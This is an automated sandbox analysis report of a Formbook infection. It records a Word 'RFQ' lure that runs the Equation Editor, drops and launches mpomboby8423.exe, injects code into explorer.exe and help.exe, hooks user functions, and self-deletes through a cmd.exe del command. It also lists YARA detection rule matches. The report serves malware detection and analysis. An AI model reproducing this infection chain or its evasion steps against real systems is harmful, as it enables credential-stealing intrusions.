Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009229B2	5_2_009229B2
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009369FE	5_2_009369FE
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009A5955	5_2_009A5955
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009A394B	5_2_009A394B
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009D3A83	5_2_009D3A83
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009CCBA4	5_2_009CCBA4
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009ADBDA	5_2_009ADBDA
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0091FBD7	5_2_0091FBD7
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00947B00	5_2_00947B00
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009BFDDD	5_2_009BFDDD
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00950D3B	5_2_00950D3B
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0092CD5B	5_2_0092CD5B
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00952E2F	5_2_00952E2F
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0093EE4C	5_2_0093EE4C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009BCFB1	5_2_009BCFB1
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00992FDC	5_2_00992FDC
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00930F3F	5_2_00930F3F
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0094DF7C	5_2_0094DF7C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00289882	5_2_00289882
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00281069	5_2_00281069
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00281072	5_2_00281072
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00288152	5_2_00288152
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0028DA0C	5_2_0028DA0C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0028AA52	5_2_0028AA52
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00285B22	5_2_00285B22
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00285B1F	5_2_00285B1F
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00282CE9	5_2_00282CE9
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00282CF2	5_2_00282CF2
Source: C:\Windows\explorer.exe	Code function: 6_2_02975A52	6_2_02975A52
Source: C:\Windows\explorer.exe	Code function: 6_2_02974882	6_2_02974882
Source: C:\Windows\explorer.exe	Code function: 6_2_0296DCF2	6_2_0296DCF2
Source: C:\Windows\explorer.exe	Code function: 6_2_0296DCE9	6_2_0296DCE9
Source: C:\Windows\explorer.exe	Code function: 6_2_02978A0C	6_2_02978A0C
Source: C:\Windows\explorer.exe	Code function: 6_2_0296C072	6_2_0296C072
Source: C:\Windows\explorer.exe	Code function: 6_2_0296C069	6_2_0296C069
Source: C:\Windows\explorer.exe	Code function: 6_2_02970B1F	6_2_02970B1F
Source: C:\Windows\explorer.exe	Code function: 6_2_02970B22	6_2_02970B22
Source: C:\Windows\explorer.exe	Code function: 6_2_02973152	6_2_02973152
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A0E0C6	7_2_00A0E0C6
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A3D005	7_2_00A3D005
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A13040	7_2_00A13040
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A2905A	7_2_00A2905A
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A0E2E9	7_2_00A0E2E9
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00AB1238	7_2_00AB1238
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00AB63BF	7_2_00AB63BF
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A0F3CF	7_2_00A0F3CF
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A363DB	7_2_00A363DB
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A12305	7_2_00A12305
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A5A37B	7_2_00A5A37B
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A17353	7_2_00A17353
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A45485	7_2_00A45485
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A21489	7_2_00A21489
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A9443E	7_2_00A9443E
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A4D47D	7_2_00A4D47D
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A2C5F0	7_2_00A2C5F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A1351F	7_2_00A1351F
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A56540	7_2_00A56540
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A14680	7_2_00A14680
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A1E6C1	7_2_00A1E6C1
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00AB2622	7_2_00AB2622
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A5A634	7_2_00A5A634
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A1C7BC	7_2_00A1C7BC
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A9579A	7_2_00A9579A
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A457C3	7_2_00A457C3
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00AAF8EE	7_2_00AAF8EE
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A3286D	7_2_00A3286D
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A1C85C	7_2_00A1C85C
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A129B2	7_2_00A129B2
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00AB098E	7_2_00AB098E
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A269FE	7_2_00A269FE
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A9394B	7_2_00A9394B
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A95955	7_2_00A95955
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00AC3A83	7_2_00AC3A83
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00ABCBA4	7_2_00ABCBA4
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A9DBDA	7_2_00A9DBDA
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A0FBD7	7_2_00A0FBD7
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A37B00	7_2_00A37B00
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00AAFDDD	7_2_00AAFDDD
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A40D3B	7_2_00A40D3B
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A1CD5B	7_2_00A1CD5B
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A42E2F	7_2_00A42E2F
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A2EE4C	7_2_00A2EE4C
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00AACFB1	7_2_00AACFB1
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A82FDC	7_2_00A82FDC
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A20F3F	7_2_00A20F3F
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A3DF7C	7_2_00A3DF7C
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009E195	7_2_0009E195
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00089E3B	7_2_00089E3B
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00089E40	7_2_00089E40
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00082FB0	7_2_00082FB0

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 012B6EF1 appears 84 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 012B9160 appears 64 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 012BBFC3 appears 38 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 0091DF5C appears 121 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 00963F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 0091E2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 012B6F06 appears 36 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 012B7021 appears 40 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 0098F970 appears 84 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 0096373B appears 245 times
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: String function: 012B715C appears 370 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 00A0DF5C appears 119 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 00A7F970 appears 84 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 00A53F92 appears 132 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 00A5373B appears 245 times
Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 00A0E2A8 appears 38 times

Source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.mpomboby8423.exe.280000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.mpomboby8423.exe.280000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.mpomboby8423.exe.280000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.mpomboby8423.exe.280000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.mpomboby8423.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.mpomboby8423.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.mpomboby8423.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.mpomboby8423.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: mpomboby8423.exe, 00000004.00000002.2104552065.0000000000B30000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2113776918.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@10/8@3/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$Q RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE0AD.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Command line argument: Kernel32.dll	4_2_012B1040
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Command line argument: User32.dll	4_2_012B1040
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Command line argument: User32.dll	4_2_012B1040
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Command line argument: IEUCIZEO	4_2_012B1040
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Command line argument: Kernel32.dll	5_2_012B1040
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Command line argument: User32.dll	5_2_012B1040
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Command line argument: User32.dll	5_2_012B1040
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Command line argument: IEUCIZEO	5_2_012B1040

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mpomboby8423.exe C:\Users\user\AppData\Roaming\mpomboby8423.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mpomboby8423.exe C:\Users\user\AppData\Roaming\mpomboby8423.exe
Source: unknown	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\mpomboby8423.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\mpomboby8423.exe C:\Users\user\AppData\Roaming\mpomboby8423.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Process created: C:\Users\user\AppData\Roaming\mpomboby8423.exe C:\Users\user\AppData\Roaming\mpomboby8423.exe	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\mpomboby8423.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc

Static file information: File size 1323990 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: mpomboby8423.exe, help.exe
Source:	Binary string: help.pdb source: mpomboby8423.exe, 00000005.00000002.2137106093.0000000000534000.00000004.00000020.sdmp

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Code function: 4_2_012C1B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

4_2_012C1B13

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012B91A5 push ecx; ret	4_2_012B91B8
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041D0D2 push eax; ret	5_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041D0DB push eax; ret	5_2_0041D142
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041D085 push eax; ret	5_2_0041D0D8
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041D13C push eax; ret	5_2_0041D142
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_004169EE push edi; retf	5_2_004169F5
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00417CFC push ebx; retf	5_2_00417D04
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041ACB4 push ss; iretd	5_2_0041ACBA
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041E525 pushad ; ret	5_2_0041E52C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012B91A5 push ecx; ret	5_2_012B91B8
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0091DFA1 push ecx; ret	5_2_0091DFB4
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A0DFA1 push ecx; ret	7_2_00A0DFB4
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009D085 push eax; ret	7_2_0009D0D8
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009D0DB push eax; ret	7_2_0009D142
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009D0D2 push eax; ret	7_2_0009D0D8
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009D13C push eax; ret	7_2_0009D142
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009E525 pushad ; ret	7_2_0009E52C
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_000969EE push edi; retf	7_2_000969F5
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009ACB4 push ss; iretd	7_2_0009ACBA
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00097CFC push ebx; retf	7_2_00097D04

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\mpomboby8423.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEE

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
